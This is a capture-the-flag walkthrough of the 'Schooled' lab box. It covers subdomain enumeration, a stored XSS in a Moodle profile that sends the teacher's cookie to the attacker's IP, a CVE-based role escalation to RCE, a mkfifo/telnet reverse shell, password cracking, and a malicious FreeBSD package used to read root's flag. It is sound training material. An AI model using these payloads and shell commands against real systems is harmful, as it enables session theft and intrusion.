Initial Enumeration

The foothold of this box was particularly interesting as it required an enumeration tactic I don’t typically use on CTF’s – subdomain scanning.

To start this box up- like all the others- I ran an nmap scan on it. What I found wasn’t all that interesting, just ssh and an Apache web server.

So after that scan I decided to check the website out. There really wasn’t anything all that interesting about that either. It just looked like a template.

So after exploring the site to no avail I decided to fire up ffuf to see if there were any interesting files or directories that could be found. Unfortunately yet again there was nothing of interest. At this point I was starting to get a little frustrated at the lack of usable information, but I wasn’t out of luck quite yet, there were still a couple of things I could try. One being running a more thorough nmap scan as, unless specified otherwise, nmap will only scan 1000 common ports. So having nmap scan more ports can yield some interesting information. This can be done by adding a “-” next to the port option as shown below.

nmap -p- -T5 -A schooled.htb

I did find that port 33060 was open which is supposedly for the mysql-x, unfortunately after a lot of searching I determined that it was likely just a red herring meant to throw people off.

After that minor setback I finally decided to try a subdomain scan using the command below.

gobuster vhost --wordlist /usr/share/wordlists/subdomains-10000.txt -u http://schooled.htb/

I had no idea what Moodle was so I turned to google yet again. I learned that it is an open source education management system created to help with online learning. Apparently the platform had struggled with XSS vulnerabilities in the past, this information will be important later on. After learning what it was I checked the site out and was greeted with a list of classes and teachers.

Attempting to click on any of the links brought you to a login page. So I created an account and found that I was able to enroll in the mathematics class, but not any of the others. Enrolling in the class granted me the access to read the class announcements the most interesting one explained that the teacher will be checking all enrolled students “MoodleNet” profiles to ensure they are setup.

After seeing this my first thought was that perhaps there is a stored XSS vulnerability in user profiles that would allow me to steal the teachers session key and thus login as him. It turns out that was indeed the case and the vulnerability was assigned CVE-2020-25267. So I immediately set out to exploit this. I did so by going to my profile and setting my MoodleNet profile to:

<script>document.location="http://10.10.14.7?c="+document.cookie;"</script>

This approach is hardly inconspicuous- the victim will immediately be notified that something is wrong as instead of seeing my Moodle profile he will instead be sent to my PHP server. A much quieter approach would be to create an image and set its source URL as the attackers server and send the session key through that. But considering this is just a CTF it doesn’t really matter.

After setting my MoodleNet profile I ran a PHP server, which looking back was pretty unnecessary, I easily could have just used netcat to listen at port 80, but it worked in the end so it doesn’t matter all that much. I ran the server by running this command:

sudo php -S 0.0.0.0:80

So now in theory whenever the teacher “checks” my profile his session key will be sent to my server.

Bingo! it worked like a charm. So, now that I have access to a teachers account what can I do? Turns out there is a vulnerability affecting the version in use that allowed a teacher to change their role from teacher to manager. Then using this manager role plugins can be uploaded to the server to gain RCE. The vulnerability in question was CVE-2020-14321. Luckily a couple Proof-Of-Concept scripts already existed to ease the exploitation process. The one I used was this. Armed with the knowledge of the system being FreeBSD I was able to find a reverse shell to get into the system:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 10.10.14.7 2345 > /tmp/f

Getting User Access

Not going to lie this next part took me way too long to figure out, despite it being relatively simple.

After a little enumeration I discovered a config.php file in the /usr/local/www/apache24/data/moodle directory.

Within this file I found credentials for a Mysql server:

Having acquired those credentials naturally I tried to login using the mysql command. Unfortunately for me the mysql binary wasn’t in /usr/bin so the command didn’t work. For whatever reason instead of searching for the binary elsewhere I gave up on the proposition and continued to sift through all the files to no avail. After doing so for hours I finally decided to just create a php file to execute sql queries, which again not really sure why I did this when I could have just found the sql binary in /usr/loca/bin/mysql, but it ended up working out in the end anyway. So now with the ability to scour the database I started searching for interesting tables. One of which was the mdl_users database. This table contained users and password hashes which was exactly what I was looking for. There were a lot of users but only one piqued my interest as it’s name was jamie, and this name just happened to be listed in /etc/passwd.

So I ran this hash through hashid to discover it was of the bcrypt variant. Using this knowledge I was able to run it through JohnTheRipper and find that Jamie’s password was: !QAZ2wsx

From there I was able to ssh into the box as Jamie and grab the user flag.

Privilege Escalation To Root

Getting root was relatively easy compared to user.

I first did a little enumeration and learned that I was able to run two commands using sudo:

Turns out there is a GTFOBin to get root in a situation like this. Apparently when installing a package said package can run a script before installation, and if the install command is run using sudo then the script will have root privileges. Exploitation of this was trivial. I simply created a package on my machine with fpm using these commands:

echo "cat /root/root.txt" > f.sh
fpm -n f -s dir -t freebsd -a all --before-install f.sh .

I then copied the package over to the box and installed it…

and just like that we have the root flag.

Conclusion

Overall this was probably one of the more frustrating boxes for me, it took me a lot more time than many of the others I have done, and I nearly quit mid way through. Luckily I stuck with it and it was definitely one of the more rewarding boxes I have done. It taught me a lot and really tested my commitment. So thank you TheCyberGeek for creating such a great box!